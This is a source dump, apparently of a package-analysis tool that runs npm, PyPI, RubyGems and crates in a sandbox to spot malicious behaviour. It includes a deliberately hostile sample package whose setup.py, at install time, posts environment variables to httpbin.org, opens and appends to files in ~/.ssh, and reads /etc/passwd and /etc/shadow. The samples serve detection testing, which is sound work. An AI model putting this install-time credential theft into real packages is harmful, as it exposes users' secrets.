11 | 12 | 13 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9@sha256:edee3d665aba1d84f5344eca825d0de34b38dbf77a776cafd9df65c67e240866 2 | 3 | WORKDIR /sample_python_package 4 | 5 | COPY . /sample_python_package 6 | 7 | RUN pip install --upgrade build 8 | 9 | RUN python3 -m build 10 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/pyproject.toml: -------------------------------------------------------------------------------- 1 | [build-system] 2 | requires = ["setuptools"] 3 | build-backend = "setuptools.build_meta" 4 | 5 | [project] 6 | name = "sample_python_package" 7 | version = "0.0.1" 8 | authors = [ 9 | { name="OpenSSF " }, 10 | ] 11 | description = "A small example package" 12 | readme = "README.md" 13 | requires-python = ">=3.7" 14 | classifiers = [ 15 | "Programming Language :: Python :: 3", 16 | "License :: OSI Approved :: Apache Software License", 17 | "Operating System :: OS Independent", 18 | ] 19 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/setup.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) 4 | sys.path.append(SCRIPT_DIR) 5 | 6 | from setuptools import setup, find_packages 7 | from src.example import * 8 | 9 | setup(name="sample_python_package", 10 | packages=find_packages(),) 11 | 12 | [f("setup.py", True) for f in https_functions + access_credentials_functions] 13 | -------------------------------------------------------------------------------- /sample_packages/sample_python_package/src/__init__.py: -------------------------------------------------------------------------------- 1 | import 
# Sends an HTTPS post request and prints out the response.
# Exfiltrates environment variables.
def send_https_post_request(called_from: str, print_logs: bool) -> None:
    host = "www.httpbin.org"
    conn = http.client.HTTPSConnection(host)
    data = {"text": f"Sending data through HTTPS from: {called_from}. Found environment variables: {str(os.environ)}"}
    json_data = json.dumps(data)
    conn.request("POST", "/post", json_data, headers={"Host": host})
    response = conn.getresponse()
    if print_logs:
        print(response.read().decode())


# Access ssh keys and attempts to read and write to them.
# Every modified file is restored to its original content, even if the
# append fails partway through (these sample packages promise to revert
# any modifications they make).
def access_ssh_keys(called_from: str, print_logs: bool) -> None:
    ssh_keys_directory_path = os.path.join(os.path.expanduser('~'), ".ssh")
    if os.path.isdir(ssh_keys_directory_path):
        try:
            files_in_ssh_keys_directory = os.listdir(ssh_keys_directory_path)
            for file_name in files_in_ssh_keys_directory:
                full_file_path = os.path.join(ssh_keys_directory_path, file_name)
                # Skip subdirectories, agent sockets and other non-regular
                # entries: open() would raise on them and abort the loop
                # before later files are processed.
                if not os.path.isfile(full_file_path):
                    continue
                with open(full_file_path, "r") as f:
                    original_file_data = f.read()
                try:
                    with open(full_file_path, "a") as f:
                        f.write("\nWriting to files in ~/.ssh from: " + called_from)
                finally:
                    # Reset the original state of the files.
                    with open(full_file_path, "w") as f:
                        f.write(original_file_data)
            if print_logs:
                print("Files in ssh keys directory", files_in_ssh_keys_directory)
        except Exception as e:
            # Fail gracefully to allow execution to continue.
            if print_logs:
                print(f"An exception occurred when calling access_ssh_keys: {str(e)}")
    elif print_logs:
        print("Could not locate ssh key directory.")

# Reads a file (if it is a regular file) and optionally logs how many lines it has.
# Missing files and read errors are ignored so execution can continue.
def read_file_and_log(file_to_read: str, called_from: str, print_logs: bool) -> None:
    if os.path.isfile(file_to_read):
        try:
            with open(file_to_read, "r") as f:
                file_lines = f.readlines()
            if print_logs:
                print("Read " + file_to_read + " from: " + called_from + ". Lines: " + str(len(file_lines)))
        except Exception as e:
            # Fail gracefully to allow execution to continue.
            if print_logs:
                print(f"An exception occurred when calling read_file_and_log: {str(e)}")

# Attempts to read the system password files.
def access_passwords(called_from: str, print_logs: bool) -> None:
    password_file = os.path.join(os.path.abspath(os.sep), "etc", "passwd")
    shadow_password_file = os.path.join(os.path.abspath(os.sep), "etc", "shadow")
    read_file_and_log(password_file, called_from, print_logs)
    # Requires root to read.
    read_file_and_log(shadow_password_file, called_from, print_logs)
# Installs the gem described by +package+ via `gem install`.
# A local gem file takes precedence over a registry install; when installing
# from the registry, the -v flag is added only if a version was requested.
def install(package)
  cmd = ["gem", "install"]
  if package.local_file
    cmd << package.local_file
  else
    if package.version
      cmd << "-v"
      cmd << package.version
    end
    cmd << package.name
  end

  # capture2e merges stdout and stderr so all installer output is shown together
  output, status = Open3.capture2e(*cmd)
  puts output

  if status.success?
    puts "Install succeeded."
    return
  end

  # Always exit on failure.
  # Install failing is either an interesting issue, or an opportunity to
  # improve the analysis.
  puts "Install failed."
  exit 1
end

# Requires every .rb file shipped in the installed gem so that top-level code
# in each file executes under dynamic analysis. Failures to load an individual
# file are reported but do not stop the remaining files.
def importPkg(package)
  spec = Gem::Specification.find_by_name(package.name)

  spec.require_paths.each do |require_path|
    # require_paths entries may be absolute, or relative to the gem's install dir
    if Pathname.new(require_path).absolute?
      lib_path = Pathname.new(require_path)
    else
      lib_path = Pathname.new(File.join(spec.full_gem_path, require_path))
    end

    Find.find(lib_path.to_s) do |path|
      if path.end_with?('.rb')
        relative_path = Pathname.new(path).relative_path_from(lib_path)

        # require by path relative to the load path, with the .rb suffix removed
        require_path = relative_path.to_s.delete_suffix('.rb')
        puts "Loading #{require_path}"
        begin
          require require_path
        rescue Exception => e
          puts "Failed to load #{require_path}: #{e}"
        end
      end
    end
  end
end
@dataclass
class Package:
    """Class for tracking a package."""
    name: str
    version: Optional[str] = None
    local_path: Optional[str] = None

    def get_dependency_line(self):
        """Render this package's dependency entry for Cargo.toml.

        A local path takes precedence over a pinned version; with neither,
        any version ("*") is accepted.
        """
        if self.local_path:
            spec = f'{{ path = "{self.local_path}" }}'
        else:
            spec = f'"{self.version}"' if self.version else '"*"'
        return f'{self.name} = {spec}'
def importPkg(package: Package):
    """Import phase: prepend a glob import of the package to src/main.rs and
    `cargo run` the crate so its code is linked and executed.

    Import failures are logged but not fatal (unlike install failures).
    """
    # Cargo package names may contain hyphens, but in Rust source the crate
    # must be referenced with underscores (e.g. package "proc-macro2" is
    # `use proc_macro2::*;`). Writing the raw name would be a syntax error.
    crate_name = package.name.strip().replace('-', '_')
    path_to_rs = os.path.join(os.getcwd(), 'src', 'main.rs')
    try:
        with open(path_to_rs, 'r+') as handle:
            content = handle.read()
            handle.seek(0, 0)
            # Suppress warnings about the injected import so build output stays clean.
            handle.write('#[allow(unused_imports)]\n')
            handle.write(f'use {crate_name}::*;' + '\n' + content)
            handle.flush()
        subprocess.check_output(['cargo', 'run'], stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as e:
        print('Failed to import:')
        print(e.output.decode())
        traceback.print_exc()
92 | for phase in PHASES[phase]: 93 | phase(package) 94 | 95 | 96 | if __name__ == '__main__': 97 | main() 98 | -------------------------------------------------------------------------------- /sandboxes/dynamicanalysis/bowerrc: -------------------------------------------------------------------------------- 1 | { "allow-root": true } -------------------------------------------------------------------------------- /sandboxes/dynamicanalysis/pypi-packages.txt: -------------------------------------------------------------------------------- 1 | # These Python packages are installed in the sandbox prior to the package under analysis 2 | # They are meant to simulate packages commonly installed on a typical system. 3 | # Hashes are used to pin dependency artifacts (https://pip.pypa.io/en/stable/topics/secure-installs/) 4 | 5 | # The hashes below are for the binary distributions 6 | 7 | certifi==2022.12.7 \ 8 | --hash=sha256:4ad3232f5e926d6718ec31cfc1fcadfde020920e278684144551c91769c7bc18 9 | charset-normalizer==2.1.1 \ 10 | --hash=sha256:83e9a75d1911279afd89352c68b45348559d1fc0506b054b346651b5e7fee29f 11 | idna==3.4 \ 12 | --hash=sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2 13 | requests==2.28.1 \ 14 | --hash=sha256:8fefa2a1a1365bf5520aac41836fbee479da67864514bdb821f31ce07ce65349 15 | urllib3==1.26.14 \ 16 | --hash=sha256:75edcdc2f7d85b137124a6c3c9fc3933cdeaa12ecb9a6a959f22797a0feca7e1 17 | -------------------------------------------------------------------------------- /sandboxes/staticanalysis/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build 2 | 3 | # Note: Dockerfile uses paths relative to the top-level project directory, 4 | # so it should be built from that directory, i.e: 5 | # $ cd package-analysis 6 | # $ docker build -f sandboxes/staticanalysis/Dockerfile . 
7 | 8 | # Cache dependencies to avoid downloading again on code change 9 | WORKDIR /src 10 | # Dependencies for package analysis 11 | COPY ./go.mod ./go.sum ./ 12 | 13 | RUN go mod download 14 | 15 | COPY . ./ 16 | 17 | WORKDIR /src/sandboxes/staticanalysis 18 | # If CGO is disabled then we don't need glibc 19 | RUN CGO_ENABLED=0 go build -o staticanalyze staticanalyze.go 20 | 21 | FROM alpine:3.17.1@sha256:93d5a28ff72d288d69b5997b8ba47396d2cbb62a72b5d87cd3351094b5d578a0 22 | RUN apk add --no-cache file && \ 23 | apk add --no-cache nodejs && \ 24 | apk add --no-cache npm && \ 25 | apk add --no-cache python3 26 | 27 | COPY --from=build /src/sandboxes/staticanalysis/staticanalyze /usr/local/bin/staticanalyze 28 | RUN chmod 755 /usr/local/bin/staticanalyze 29 | 30 | RUN mkdir /npm_deps 31 | COPY --from=build /src/internal/staticanalysis/parsing/package.json /src/internal/staticanalysis/parsing/package-lock.json /npm_deps/ 32 | 33 | # cache NPM installs in /npm_cache so that static analysis binary can use them 34 | RUN mkdir -m 755 /npm_cache && \ 35 | npm ci --prefix /npm_deps --cache /npm_cache 36 | 37 | WORKDIR /app 38 | 39 | ENTRYPOINT [ "sleep" ] 40 | CMD [ "30m" ] 41 | -------------------------------------------------------------------------------- /scripts/analyse-tarballs.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | 3 | # Replace with root of package analysis folder 4 | PACKAGE_ANALYSIS_ROOT=~/package-analysis 5 | 6 | # This script runs static analysis on all packages in a directory and 7 | # creates a new directory with all the static analysis results for each package. 8 | # Currently, it only supports NPM packages (as static analysis does). 9 | 10 | RUN_ANALYSIS="$PACKAGE_ANALYSIS_ROOT/scripts/run_analysis.sh" 11 | FORMAT_JSON="$PACKAGE_ANALYSIS_ROOT/scripts/format-static-analysis-json.py" 12 | 13 | if ! 
# Runs dynamic + static analysis on one npm package archive and pretty-prints
# the JSON results into the results directory.
# Arguments:
#   $1 - path to the .tgz/.tar.gz archive
#   $2 - directory to write formatted results into
#   $3 - optional start letter; packages sorting before it are skipped
#        (empty means nothing is skipped, since [[ "$x" < "" ]] is never true)
function process_archive {
	ARCHIVE_PATH="$1"
	RESULTS_DIR="$2"
	START_LETTER="$3"
	if [[ -z "$ARCHIVE_PATH" ]]; then
		echo "Archive path is empty"
		return 1
	elif [[ -z "$RESULTS_DIR" ]]; then
		echo "Results dir is empty"
		return 1
	fi

	# strip the directory prefix and .tgz extension to get "<name>-<version>"
	PACKAGE_VERSION_EXT=${ARCHIVE_PATH##"$ARCHIVES_DIR/"}
	PACKAGE_VERSION=${PACKAGE_VERSION_EXT%%.tgz}
	PACKAGE_FIRST_LETTER=${PACKAGE_VERSION:0:1}
	if [[ "$PACKAGE_FIRST_LETTER" < "$START_LETTER" ]]; then
		echo SKIP "$PACKAGE_VERSION"
		return
	fi
	# package name is everything before the last '-' character
	# package version is everything between the last '-' character and .tgz
	PACKAGE=$(python3 -c "print('-'.join(\"$PACKAGE_VERSION\".split('-')[:-1]))")
	VERSION=$(python3 -c "print(\"$PACKAGE_VERSION\".split('-')[-1])")
	echo "Package: $PACKAGE"
	echo "Version: $VERSION"

	# analysis writes into a throwaway temp dir; formatted copies are kept below
	OUTPUT_RESULTS_DIR=$(mktemp -d)

	# Notes on options:
	# 1. To run local sandbox images, add -nopull
	# 2. If running static analysis only from local images (i.e. -nopull), network access is not required.
	# In this case, the -offline -fully-offline options can be added to disable network access totally.
	RESULTS_DIR="$OUTPUT_RESULTS_DIR/dynamic" STATIC_RESULTS_DIR="$OUTPUT_RESULTS_DIR/static" "$RUN_ANALYSIS" \
		-ecosystem npm -package "$PACKAGE" -local "$ARCHIVE_PATH" -nointeractive

	# pretty print while keeping some of the small JSON structs on a single line
	"$FORMAT_JSON" "$OUTPUT_RESULTS_DIR/dynamic/results.json" "$RESULTS_DIR/$PACKAGE_VERSION-results-dynamic.json"
	"$FORMAT_JSON" "$OUTPUT_RESULTS_DIR/static/results.json" "$RESULTS_DIR/$PACKAGE_VERSION-results-static.json"

	rm -rf "$OUTPUT_RESULTS_DIR"
}
27 | ;; 28 | [Nn]* ) 29 | echo "kubectl rollout restart deployment workers-deployment" 30 | kubectl rollout restart statefulset workers-deployment 31 | ;; 32 | esac 33 | 34 | 35 | popd || (echo "failed to popd" && exit 1) 36 | -------------------------------------------------------------------------------- /scripts/format-static-analysis-json.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """ 4 | Custom tool to pretty-print JSON with certain fields compacted 5 | 6 | Adapted from source of `python -m json.tool` 7 | reference: github.com/python/cpython/blob/main/Lib/json/tool.py 8 | """ 9 | 10 | import json 11 | import re 12 | import sys 13 | 14 | 15 | # Changes JSON structs that are formatted like: 16 | # { 17 | # "key1": ... 18 | # } 19 | # into ones like 20 | # { "key1": ... } 21 | struct_single_key_substitution = ( 22 | re.compile('{$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE), 23 | '{ "\\1": \\2 }' 24 | ) 25 | 26 | # Changes JSON structs that are formatted like: 27 | # { 28 | # "key1": ..., 29 | # "key2": ... 30 | # } 31 | # into ones like 32 | # { "key1": ..., "key2": ... } 33 | struct_pair_substitution = ( 34 | re.compile('{$\\n^\\s*"(.+)": ?(.*),$\\n^\\s*"(.+)": ?(.*)$\\n^\\s*}', re.MULTILINE), 35 | '{ "\\1": \\2, "\\3": \\4 }' 36 | ) 37 | 38 | # Changes JSON structs that are formatted like: 39 | # { 40 | # "key1": ..., 41 | # "key2": ..., 42 | # "key3": ... 43 | # } 44 | # into ones like 45 | # { "key1": ..., "key2": ..., "key3": ... 
# Pretty prints a JSON object with newlines and indentation, then applies
# the substitutions above while maintaining indentation level.
def format_json(json_object) -> str:
    """Serialise json_object with 4-space indentation, then collapse small
    JSON objects (1 to 3 keys) back onto single lines via the regex
    substitutions defined above, applied in order of increasing size."""
    # pretty print with newlines and indent with 4 spaces,
    pretty_printed = json.dumps(json_object, indent=4)

    # apply all replacements in sequence
    for (pattern, replacement) in all_substitutions:
        pretty_printed = re.sub(pattern, replacement, pretty_printed)

    return pretty_printed
`make e2e_test_logs_feeds` to see information on the packages which have been sent downstream.
Run `kafkacat` to observe the topics: 56 | - package-feeds: `kafkacat -C -J -b localhost:9094 -t package-feeds` 57 | - workers: `kafkacat -C -J -b localhost:9094 -t workers` 58 | - notifications: `kafkacat -C -J -b localhost:9094 -t notifications` 59 | 60 | ## Troubleshooting 61 | 62 | ### Feeds does not start (missing config) 63 | 64 | This can happen if `./config` is not world-readable. You will see the error message `open /config/feeds.yml: permission denied` in the feeds logs. 65 | 66 | To fix simply run: 67 | 68 | ```shell 69 | $ chmod ugo+rx ./config 70 | $ chmod ugo+r ./config/feeds.yml 71 | ``` 72 | 73 | ### Sandbox container is not starting (cgroups v2) 74 | 75 | If the `analysis` logs show failures when trying to start the sandbox container, your machine may need to be configured to use cgroups v2. 76 | 77 | To work with cgroups v2 you will need to: 78 | 79 | 1. add/edit `/etc/docker/daemon.json` and the following: 80 | 81 | ```json 82 | { 83 | "default-cgroupns-mode": "host" 84 | } 85 | ``` 86 | 87 | 2. restart dockerd (if it is running). e.g.: 88 | 89 | ```shell 90 | $ systemctl restart docker.service 91 | ``` 92 | -------------------------------------------------------------------------------- /test/e2e/docker-compose.test.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | analysis: 4 | image: gcr.io/ossf-malware-analysis/analysis:test 5 | environment: 6 | OSSF_SANDBOX_NOPULL: "true" 7 | # for mounting local sandbox images inside container 8 | volumes: 9 | - "/var/lib/containers:/var/lib/containers" 10 | 11 | scheduler: 12 | image: gcr.io/ossf-malware-analysis/scheduler:test 13 | -------------------------------------------------------------------------------- /tools/README.md: -------------------------------------------------------------------------------- 1 | # Package Analysis Tools 2 | 3 | This directory contains scripts and tools. 
4 | -------------------------------------------------------------------------------- /tools/analysis/README.md: -------------------------------------------------------------------------------- 1 | # Analysis Tools 2 | 3 | ## Analysis Runner 4 | 5 | The `analysis_runner.py` script is used to inject packages into the PubSub 6 | queue the analysis pipeline consumes work from. 7 | 8 | `node.txt`, `python.txt` and `rubygems.txt` contain lists of the top packages 9 | from these package repositories (at the time of creation). The data is from 10 | [NPM](https://www.npmjs.com/browse/depended) (* dead), 11 | [PyPI](https://hugovk.github.io/top-pypi-packages/top-pypi-packages-30-days.json) 12 | and [RubyGems](https://rubygems.org/stats). 13 | 14 | ### Prerequisites 15 | 16 | This script requires: 17 | 18 | - Python 3 19 | - [Google Cloud SDK](https://cloud.google.com/sdk/docs/install) 20 | 21 | ### Example usage 22 | 23 | Firstly, ensure you are authenticated with the cloud project: 24 | 25 | ```shell 26 | $ gcloud auth login 27 | ``` 28 | 29 | Here are some possible ways to invoke the script: 30 | 31 | ```shell 32 | $ python3 analysis_runner.py pypi --list python.txt 33 | $ python3 analysis_runner.py npm --list node.txt 34 | $ python3 analysis_runner.py npm --name my-npm-package 35 | $ python3 analysis_runner.py npm --name my-npm-package --version 0.1.1 --file /path/to/local.tgz 36 | ``` 37 | 38 | ### Bulk backfill 39 | 40 | To request a bulk backfill of a list of packages in a particular ecosystem: 41 | 42 | ```shell 43 | $ ./backfill.sh <package list file> <ecosystem> 44 | ``` 45 | -------------------------------------------------------------------------------- /tools/analysis/backfill.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh -x 2 | # Script to bulk request backfills in parallel. 
3 | 4 | NUM_WORKERS=128 5 | 6 | if [ $# -lt 2 ]; then 7 | echo "Usage: $0 " 8 | exit 1 9 | fi 10 | 11 | cat $1 | xargs -I {} -P $NUM_WORKERS -n 1 python3 analysis_runner.py -a -n {} $2 12 | -------------------------------------------------------------------------------- /tools/analysis/node.txt: -------------------------------------------------------------------------------- 1 | lodash 2 | react 3 | chalk 4 | tslib 5 | request 6 | commander 7 | express 8 | moment 9 | axios 10 | react-dom 11 | prop-types 12 | fs-extra 13 | debug 14 | vue 15 | uuid 16 | async 17 | bluebird 18 | core-js 19 | classnames 20 | inquirer 21 | yargs 22 | rxjs 23 | webpack 24 | underscore 25 | typescript 26 | glob 27 | mkdirp 28 | dotenv 29 | body-parser 30 | @types/node 31 | @babel/runtime 32 | node-fetch 33 | colors 34 | minimist 35 | jquery 36 | aws-sdk 37 | semver 38 | babel-loader 39 | eslint 40 | babel-runtime 41 | redux 42 | css-loader 43 | winston 44 | rimraf 45 | @babel/core 46 | jsonwebtoken 47 | ora 48 | style-loader 49 | styled-components 50 | babel-core 51 | shelljs 52 | yeoman-generator 53 | react-redux 54 | js-yaml 55 | cheerio 56 | eslint-plugin-import 57 | @angular/core 58 | babel-eslint 59 | through2 60 | ramda 61 | file-loader 62 | vue-router 63 | eslint-plugin-react 64 | @angular/common 65 | node-sass 66 | zone.js 67 | react-router-dom 68 | reflect-metadata 69 | mongoose 70 | q 71 | handlebars 72 | html-webpack-plugin 73 | @angular/platform-browser 74 | url-loader 75 | webpack-dev-server 76 | ws 77 | @angular/compiler 78 | @angular/forms 79 | postcss-loader 80 | request-promise 81 | mongodb 82 | @angular/platform-browser-dynamic 83 | sass-loader 84 | bootstrap 85 | @angular/router 86 | @babel/preset-env 87 | gulp 88 | jest 89 | qs 90 | ejs 91 | babel-polyfill 92 | superagent 93 | object-assign 94 | mocha 95 | path 96 | autoprefixer 97 | graphql 98 | eslint-plugin-jsx-a11y 99 | cors 100 | babel-preset-es2015 101 | socket.io 102 | react-scripts 103 | redis 104 | chai 105 | 
immutable 106 | prettier 107 | @types/react 108 | xml2js -------------------------------------------------------------------------------- /tools/analysis/python.txt: -------------------------------------------------------------------------------- 1 | urllib3 2 | six 3 | setuptools 4 | botocore 5 | requests 6 | python-dateutil 7 | certifi 8 | pip 9 | idna 10 | s3transfer 11 | chardet 12 | pyyaml 13 | boto3 14 | wheel 15 | rsa 16 | pyasn1 17 | jmespath 18 | numpy 19 | awscli 20 | docutils 21 | cffi 22 | protobuf 23 | pytz 24 | colorama 25 | attrs 26 | pycparser 27 | markupsafe 28 | jinja2 29 | cryptography 30 | pandas 31 | requests-oauthlib 32 | oauthlib 33 | importlib-metadata 34 | google-api-core 35 | click 36 | google-auth 37 | zipp 38 | cachetools 39 | pyparsing 40 | pyasn1-modules 41 | decorator 42 | typing-extensions 43 | packaging 44 | aiohttp 45 | multidict 46 | future 47 | pyjwt 48 | google-cloud-core 49 | googleapis-common-protos 50 | futures 51 | google-api-python-client 52 | jsonschema 53 | uritemplate 54 | yarl 55 | pygments 56 | google-cloud-storage 57 | isodate 58 | pyrsistent 59 | google-auth-httplib2 60 | google-resumable-media 61 | werkzeug 62 | lxml 63 | py 64 | pillow 65 | joblib 66 | grpcio 67 | msrest 68 | scipy 69 | websocket-client 70 | azure-storage-blob 71 | sqlalchemy 72 | pytest 73 | async-timeout 74 | tornado 75 | toml 76 | prometheus-client 77 | azure-core 78 | pyarrow 79 | absl-py 80 | defusedxml 81 | psutil 82 | wrapt 83 | pyopenssl 84 | pexpect 85 | flask 86 | ptyprocess 87 | webencodings 88 | httplib2 89 | prompt-toolkit 90 | pluggy 91 | ipython 92 | itsdangerous 93 | traitlets 94 | entrypoints 95 | scikit-learn 96 | appdirs 97 | ipython-genutils 98 | bleach 99 | azure-common 100 | tqdm 101 | -------------------------------------------------------------------------------- /tools/analysis/rubygems.txt: -------------------------------------------------------------------------------- 1 | activesupport 2 | aws-sdk-core 3 | bundler 4 | 
diff-lcs 5 | i18n 6 | json 7 | mime-types 8 | minitest 9 | multi_json 10 | nokogiri 11 | rack 12 | rake 13 | rspec 14 | rspec-core 15 | rspec-expectations 16 | rspec-mocks 17 | rspec-support 18 | rubygems-update 19 | thor 20 | tzinfo -------------------------------------------------------------------------------- /tools/gvisor/README.md: -------------------------------------------------------------------------------- 1 | # GVisor Scripts 2 | 3 | ## `runsc_compat.sh` 4 | 5 | This script improves the compatibility of `runsc` when it is used by 6 | [Podman](https://podman.io). 7 | 8 | This project uses [GVisor](https://github.com/google/gvisor)'s OCI runtime 9 | `runsc` to provide a sandbox for analyzing packages. The `runsc` sandbox is used 10 | by setting it as the runtime for Podman running inside a Docker container. 11 | 12 | Unfortunately there are slight differences in the flags passed from Podman 13 | (specifically `conmon`) to the `runsc`. 14 | 15 | In particular, when `podman exec` is called on a running container, the `-d` 16 | (detach) flag is passed by `conmon` to the OCI runtime. However this flag is not 17 | supported by `runsc`. Instead `runsc` supports `-detach`. 18 | 19 | So, to ensure `runsc` works correctly with Podman this script will turn `-d` 20 | into `-detach` when `exec` is called. -------------------------------------------------------------------------------- /tools/gvisor/runsc_compat.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | BIN="/usr/bin/runsc" 4 | 5 | IS_EXEC=0 # becomes 1 when any argument is the 'exec' subcommand 6 | for arg; do 7 | if [ "$arg" == "exec" ]; then 8 | IS_EXEC=1 9 | fi 10 | done 11 | 12 | 13 | # GVisor's runsc does not support "-d" which is passed to it from conmon. 14 | # runc supports "-d" for running detached so translate the "-d" argument to 15 | # the "-detach" flavor supported by runsc.
16 | if [ $IS_EXEC -eq 1 ]; then # only rewrite flags for 'exec' invocations 17 | declare -a NEWARGS 18 | for arg; do 19 | if [ "$arg" == "-d" ]; then # NOTE(review): rewrites any '-d', even ones after the container/command args; assumed OK for conmon's call pattern — confirm 20 | NEWARGS+=("-detach") 21 | else 22 | NEWARGS+=("$arg") 23 | fi 24 | done 25 | set -- "${NEWARGS[@]}" 26 | fi 27 | 28 | exec "$BIN" "$@" -------------------------------------------------------------------------------- /tools/network/iptables.rules: -------------------------------------------------------------------------------- 1 | # Create the chain used by podman networking for user-defined rules 2 | # 3 | # Note: the subnet "172.16.16.0/24" used here must match the subnet 4 | # used in podman-analysis.conflist. 5 | *filter 6 | :INPUT ACCEPT [0:0] 7 | :CNI-ADMIN - [0:0] 8 | # Block access to this host from the container network. 9 | -A INPUT -s 172.16.16.0/24 -j DROP 10 | # Block access to metadata.google.internal/AWS metadata. 11 | -A CNI-ADMIN -d 169.254.169.254/32 -j DROP 12 | # Block access to Private address spaces. 13 | -A CNI-ADMIN -s 172.16.16.0/24 -d 10.0.0.0/8 -j DROP 14 | -A CNI-ADMIN -s 172.16.16.0/24 -d 172.16.0.0/12 -j DROP 15 | -A CNI-ADMIN -s 172.16.16.0/24 -d 192.168.0.0/16 -j DROP 16 | COMMIT 17 | -------------------------------------------------------------------------------- /tools/network/podman-analysis.conflist: -------------------------------------------------------------------------------- 1 | { 2 | "cniVersion": "0.4.0", 3 | "name": "analysis-net", 4 | "plugins": [ 5 | { 6 | "type": "bridge", 7 | "bridge": "cni-analysis", 8 | "isGateway": true, 9 | "ipMasq": true, 10 | "hairpinMode": true, 11 | "ipam": { 12 | "type": "host-local", 13 | "subnet": "172.16.16.0/24", 14 | "routes": [ 15 | { "dst": "0.0.0.0/0" } 16 | ] 17 | } 18 | }, 19 | { 20 | "type": "portmap", 21 | "capabilities": { "portMappings": true } 22 | }, 23 | { 24 | "type": "firewall", 25 | "backend": "iptables" 26 | } 27 | ] 28 | } 29 | --------------------------------------------------------------------------------